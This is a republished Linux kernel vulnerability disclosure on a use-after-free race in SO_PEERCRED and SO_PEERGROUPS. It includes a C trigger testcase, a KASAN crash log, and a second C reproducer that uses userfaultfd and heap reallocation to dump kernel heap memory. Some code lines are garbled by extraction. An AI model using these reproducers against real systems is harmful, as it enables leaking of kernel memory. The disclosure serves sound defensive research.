Thursday, November 18, 2021

Linux SO_PEERCRED / SO_PEERGROUPS Race Condition / Use-After-Free

Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())

# bug description

In sock_getsockopt() (in net/core/sock.c), the handlers for the
socket options SO_PEERCRED (which has probably had a data race since
forever, and which was turned into a UAF read in v2.6.36 by commit
"af_unix: Allow SO_PEERCRED to work across namespaces") and
SO_PEERGROUPS (introduced in v4.13 by commit "net: introduce
SO_PEERGROUPS getsockopt") don't use any locking when copying data from
sk->sk_peer_cred to userspace.

This can race with operations that update sk->sk_peer_cred:

- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)

This means that if the creds are replaced and freed at the wrong time, a
use-after-free read occurs.

From what I can tell, the impact on the kernel is limited to data leakage.
Theoretically, it could also lead to an out-of-bounds *write* to
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket
whose ->sk_peer_cred is going away; however, in a normal scenario,
SO_PEERGROUPS would only be called on a socket from accept(), and a
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred
on that socket.

# simple testcase

This issue can be demonstrated with the following testcase.

Note that this testcase is using SO_PEERCRED in a weird way: it reads
the "peer credentials" of a listening socket, which doesn't really make
any semantic sense. As far as I can tell from reading the code, you
could also trigger the same UAF by racing SO_PEERCRED with repeated
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),
but then the race would get more complicated.

// compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\"
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/fsuid.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>

static int s;
static uid_t my_uid;
static gid_t my_gid;

void *ucred_thread(void *dummy) {
while (1) {
struct ucred ucred;
socklen_t optlen = sizeof(ucred);
if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))

int main(void) {
my_uid = getuid();
my_gid = getgid();

s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, \"socket\");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = \"/tmp/unix-test-socket\"
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, \"bind\");

pthread_t thread;
if (pthread_create(&thread, NULL, ucred_thread, NULL))
errx(1, \"pthread_create\");

while (1) {
if (listen(s, 16))
// avoid glibc's automatic thread sync in set*id() wrappers!
// note that setfsuid() doesn't reallocate on no-op request.
if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))
err(1, \"setresuid(raw)\");

This results in the following splat:

BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619

CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Call Trace:
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))
print_address_description.constprop.0 (mm/kasan/report.c:257)
kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)
sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
__sys_getsockopt (net/socket.c:2216)
__x64_sys_getsockopt (net/socket.c:2232)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
RIP: 0033:0x7f93cd99a5ca
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48
All code
0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0
7: f7 d8 neg %eax
9: 64 89 01 mov %eax,%fs:(%rcx)
c: 48 83 c8 ff or $0xffffffffffffffff,%rax
10: c3 ret
11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
18: 00 00 00
1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
20: 49 89 ca mov %rcx,%r10
23: b8 37 00 00 00 mov $0x37,%eax
28: 0f 05 syscall
2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction
30: 73 01 jae 0x33
32: c3 ret
33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0
3a: f7 d8 neg %eax
3c: 64 89 01 mov %eax,%fs:(%rcx)
3f: 48 rex.W

Code starting with the faulting instruction
0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
6: 73 01 jae 0x9
8: c3 ret
9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6
10: f7 d8 neg %eax
12: 64 89 01 mov %eax,%fs:(%rcx)
15: 48 rex.W
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000

Allocated by task 618:
kasan_save_stack (mm/kasan/common.c:38)
__kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)
kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)
prepare_creds (kernel/cred.c:262)
__sys_setresuid (kernel/sys.c:666)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

Freed by task 618:
kasan_save_stack (mm/kasan/common.c:38)
kasan_set_track (mm/kasan/common.c:46)
kasan_set_free_info (mm/kasan/generic.c:362)
__kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)
kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)
rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)
__do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)

Last potentially related work creation:
kasan_save_stack (mm/kasan/common.c:38)
kasan_record_aux_stack (mm/kasan/generic.c:348)
call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)
init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)
unix_listen (net/unix/af_unix.c:648)
__sys_listen (net/socket.c:1727)
__x64_sys_listen (net/socket.c:1734)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

The buggy address belongs to the object at ffff8880355c7c40
which belongs to the cache cred_jar of size 192
The buggy address is located 36 bytes inside of
192-byte region [ffff8880355c7c40, ffff8880355c7d00)
The buggy address belongs to the page:
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0
flags: 0x4000000000010200(slab|head|zone=1)
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc

# root-only reproducer for normal systems
The following is a simple reproducer that attempts to use this issue to
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)
from a dangling pointer in groups_to_user().
(Note: There are two functions called groups_to_user(). The relevant one
is in net/core/sock.c.)

This isn't quite a real exploit - it **requires root privileges** to
call setgroups() and, if userfaultfd is restricted, also to trap a kernel
fault with userfaultfd. I expect that you could get around those
limitations with some work though, assuming that the attacker is running
in a normal Linux userspace.

Note that this bug can still be used to dump gigabytes of kernel heap
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the
out-of-bounds read occurs outside of usercopy code:

static int groups_to_user(gid_t __user *dst, const struct group_info *src)
struct user_namespace *user_ns = current_user_ns();
int i;

for (i = 0; i < src->ngroups; i++)
if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))
return -EFAULT;

return 0;

// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread
#define _GNU_SOURCE
#include <pthread.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <err.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <grp.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <limits.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <linux/membarrier.h>

// kernel sets upper limit: 65536.
// up to 2 pages will be served by slabs, we probably don't want that.
// choose a size between order-3 and order-4 (means needs order-4 page)
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)
#define OUTPUT_MAPPING_LEN 0x400000000

static int s;
static int launch_eventfd;
static unsigned char *output_mapping;

static void *getsockopt_threadfn(void *dummy) {
eventfd_t evval;
if (eventfd_read(launch_eventfd, &evval))
err(1, \"eventfd_read\");
socklen_t optlen = INT_MAX;
if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {
//system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");
return NULL;

void dump(char *label) {
=== DUMP %s ===\
\", label);
system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\");

int main(void) {
char dummy_char;

// set up sleep-inducing mapping
output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,
if (output_mapping == MAP_FAILED) err(1, \"mmap\");
if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))
err(1, \"mprotect\");
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
if (uffd == -1) err(1, \"userfaultfd\");
struct uffdio_api api = {
.api = UFFD_API,
.features = 0
if (ioctl(uffd, UFFDIO_API, &api))
err(1, \"UFFDIO_API\");
struct uffdio_register reg = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000},
if (ioctl(uffd, UFFDIO_REGISTER, &reg))
err(1, \"UFFDIO_REGISTER\");

// prepare getsockopt() thread
launch_eventfd = eventfd(0, 0);
if (launch_eventfd == -1) err(1, \"eventfd\");
pthread_t thread;
if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))
errx(1, \"pthread_create\");

// set up for reallocation primitive
int realloc_fd = open(\"/proc/self/maps\", O_RDONLY);
if (realloc_fd == -1) err(1, \"open maps\");

char tmpdir[] = \"/tmp/blah.XXXXXX\";
if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\");
if (chdir(tmpdir)) err(1, \"chdir tmpdir\");
char dummy_name[100];
memset(dummy_name, 'A', 99);
dummy_name[99] = '\\0';
char move_target[200];
sprintf(move_target, \"d/%s\", dummy_name);
mkdir(dummy_name, 0700);
char file_path[200];
sprintf(file_path, \"%s/a\", dummy_name);
int path_len = strlen(tmpdir) + strlen(file_path); // approximate
int fd = open(file_path, O_CREAT|O_RDWR, 0600);
if (fd == -1) err(1, \"open deep file\");
if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED)
err(1, \"mmap deep\");
bool half_deep_probed = false;
while (path_len < ALLOC_SIZE) {
mkdir(\"d\", 0700);
if (rename(dummy_name, move_target)) err(1, \"rename\");
if (rename(\"d\", dummy_name)) err(1, \"rename 2\");
path_len += strlen(dummy_name) + 1;
if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) {
half_deep_probed = true;
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
err(1, \"read maps half-deep\");

s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, \"socket\");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = \"/tmp/unix-test-socket\"
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, \"bind\");

pid_t child = fork();
if (child == -1) err(1, \"fork\");
if (child == 0) {
gid_t gid_list[NUM_GROUPS];
gid_t my_gid = getgid();
for (int i=0; i<NUM_GROUPS; i++) {
gid_list[i] = my_gid; // (kernel doesn't deduplicate)
dump(\"before setgroups\");
if (setgroups(NUM_GROUPS, gid_list))
err(1, \"setgroups\");
dump(\"after setgroups, expect -1\");
if (listen(s, 16))
err(1, \"listen in child\");
return 0;
int status;
if (waitpid(child, &status, 0) != child)
err(1, \"wait\");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, \"child didn't exit cleanly\");

// wildly flailing around in the hope of flushing out the task
// (but not the creds yet)
usleep(400 * 1000);
for (int i=0; i<4; i++)
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);

// launch getsockopt, and wait for it to start
if (eventfd_write(launch_eventfd, 1)) err(1, \"eventfd_write\");
usleep(500 * 1000);

// schedule RCU freeing of the creds
if (listen(s, 16))
err(1, \"listen in parent\");
// wait for RCU (twice to be safe - yes, this is senseless voodoo)
for (int i=0; i<2; i++)
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);

// crappy reallocation attempt, should overwrite length with ASCII
dump(\"pre-reallocation, expect +1\");
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
err(1, \"read maps deep\");
dump(\"post-reallocation, expect -1\");

// resume getsockopt
struct uffdio_zeropage zeropage = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000}
if (ioctl(uffd, UFFDIO_ZEROPAGE, &zeropage)) err(1, \"ZEROPAGE\");

// wait for getsockopt to finish
if (pthread_join(thread, NULL)) err(1, \"pthread_join\");

// dump results
int pagemap_fd = open(\"/proc/self/pagemap\", O_RDONLY);
if (pagemap_fd == -1) err(1, \"open pagemap\");
unsigned long filled_pages = 0;
for (unsigned long addr = (unsigned long)output_mapping;
addr < (unsigned long)output_mapping + OUTPUT_MAPPING_LEN;
addr += 0x1000) {
uint64_t val;
if (pread(pagemap_fd, &val, sizeof(val), addr / 0x1000 * 8) != sizeof(val))
err(1, \"pagemap read\");
if ((val >> 62) == 0)
printf(\"got %lu pages\
\", filled_pages);
FILE *hexdump = popen(\"hexdump -C\", \"w\");
if (!hexdump)
err(1, \"popen\");
fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump);

# disclosure deadline
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2021-12-27.

Found by: [email protected]

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore